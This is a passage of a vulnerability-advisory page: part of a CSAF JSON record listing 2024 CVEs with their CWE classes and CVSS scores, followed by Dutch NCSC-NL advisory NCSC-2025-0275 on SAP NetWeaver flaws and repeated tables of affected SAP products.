"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-36387"
},
{
"cve": "CVE-2024-37370",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673507",
"CSAFPID-1673508",
"CSAFPID-1673509"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-37370",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-37370.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673507",
"CSAFPID-1673508",
"CSAFPID-1673509"
]
}
],
"title": "CVE-2024-37370"
},
{
"cve": "CVE-2024-37371",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673507",
"CSAFPID-1673508",
"CSAFPID-1673509"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-37371",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-37371.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673507",
"CSAFPID-1673508",
"CSAFPID-1673509"
]
}
],
"title": "CVE-2024-37371"
},
{
"cve": "CVE-2024-37372",
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-37372",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-37372.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-37372"
},
{
"cve": "CVE-2024-38356",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673510",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38356",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38356.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673510",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-38356"
},
{
"cve": "CVE-2024-38357",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673510",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38357",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38357.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673510",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-38357"
},
{
"cve": "CVE-2024-38472",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38472",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38472.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38472"
},
{
"cve": "CVE-2024-38473",
"cwe": {
"id": "CWE-172",
"name": "Encoding Error"
},
"notes": [
{
"category": "other",
"text": "Encoding Error",
"title": "CWE-172"
},
{
"category": "other",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38473",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38473.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38473"
},
{
"cve": "CVE-2024-38474",
"cwe": {
"id": "CWE-172",
"name": "Encoding Error"
},
"notes": [
{
"category": "other",
"text": "Encoding Error",
"title": "CWE-172"
},
{
"category": "other",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38474",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38474.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38474"
},
{
"cve": "CVE-2024-38475",
"cwe": {
"id": "CWE-284",
"name": "Improper Access Control"
},
"notes": [
{
"category": "other",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "other",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38475",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38475.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38475"
},
{
"cve": "CVE-2024-38476",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Inclusion of Functionality from Untrusted Control Sphere",
"title": "CWE-829"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38476",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38476.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38476"
},
{
"cve": "CVE-2024-38477",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38477",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38477.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-38477"
},
{
"cve": "CVE-2024-38998",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673511",
"CSAFPID-1673512",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38998",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38998.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673511",
"CSAFPID-1673512",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-38998"
},
{
"cve": "CVE-2024-38999",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673511",
"CSAFPID-1673512",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38999",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-38999.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673511",
"CSAFPID-1673512",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-38999"
},
{
"cve": "CVE-2024-39573",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-39573",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-39573.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-39573"
},
{
"cve": "CVE-2024-39884",
"cwe": {
"id": "CWE-18",
"name": "-"
},
"notes": [
{
"category": "other",
"text": "CWE-18",
"title": "CWE-18"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-39884",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-39884.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-39884"
},
{
"cve": "CVE-2024-40725",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Exposure of Resource to Wrong Sphere",
"title": "CWE-668"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-40725",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-40725.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479"
]
}
],
"title": "CVE-2024-40725"
},
{
"cve": "CVE-2024-40898",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-40898",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-40898.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479"
]
}
],
"title": "CVE-2024-40898"
},
{
"cve": "CVE-2024-45490",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "other",
"text": "Incorrect Calculation of Buffer Size",
"title": "CWE-131"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45490",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-45490.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
}
],
"title": "CVE-2024-45490"
},
{
"cve": "CVE-2024-45491",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45491",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-45491.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
}
],
"title": "CVE-2024-45491"
},
{
"cve": "CVE-2024-45492",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45492",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-45492.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
}
],
"title": "CVE-2024-45492"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "other",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45801",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-45801.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1503575",
"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-45801"
}
]
}
NCSC-2025-0275
Vulnerability from csaf_ncscnl - Published: 2025-09-09 11:12 - Updated: 2025-09-09 11:12Summary
Kwetsbaarheden verholpen in SAP producten
Notes
The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:
NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.
NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.
This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.
Feiten: SAP heeft kwetsbaarheden verholpen in verschillende producten, waaronder in SAP NetWeaver, SAP NetWeaver Application Server Java en SAP Landscape Transformation.
Interpretaties: De kwetsbaarheden bevinden zich onder andere in de RMI-P4 module en de SAP NetWeaver AS Java platform.
De kwetsbaarheid met kenmerk CVE-2025-42944 betreft een deserialisatieprobleem dat kan worden misbruikt door niet-geauthenticeerde aanvallers, wat kan leiden tot willekeurige OS-commando-executie. Dit bedreigt de vertrouwelijkheid, integriteit en beschikbaarheid van de applicatie.
De kwetsbaarheid met kenmerk CVE-2025-42922 stelt geauthenticeerde niet-administratieve gebruikers in staat om willekeurige bestanden te uploaden via de Deploy Web Service-functie. Dit kan ook leiden tot compromittering van systeemvertrouwelijkheid, integriteit en beschikbaarheid.
Oplossingen: SAP heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.
Kans: medium
Schade: high
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-94: Improper Control of Generation of Code ('Code Injection')
CWE-250: Execution with Unnecessary Privileges
CWE-287: Improper Authentication
CWE-306: Missing Authentication for Critical Function
CWE-341: Predictable from Observable State
CWE-352: Cross-Site Request Forgery (CSRF)
CWE-404: Improper Resource Shutdown or Release
CWE-502: Deserialization of Untrusted Data
CWE-521: Weak Password Requirements
CWE-522: Insufficiently Protected Credentials
CWE-606: Unchecked Input for Loop Condition
CWE-770: Allocation of Resources Without Limits or Throttling
CWE-862: Missing Authorization
CWE-863: Incorrect Authorization
CWE-1022: Use of Web Link to Untrusted Target with window.opener Access
CWE-1287: Improper Validation of Specified Type of Input
CWE-1395: Dependency on Vulnerable Third-Party Component
7.5 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
9.6 (Critical)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-404
- Improper Resource Shutdown or Release
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
7.4 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
7.7 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
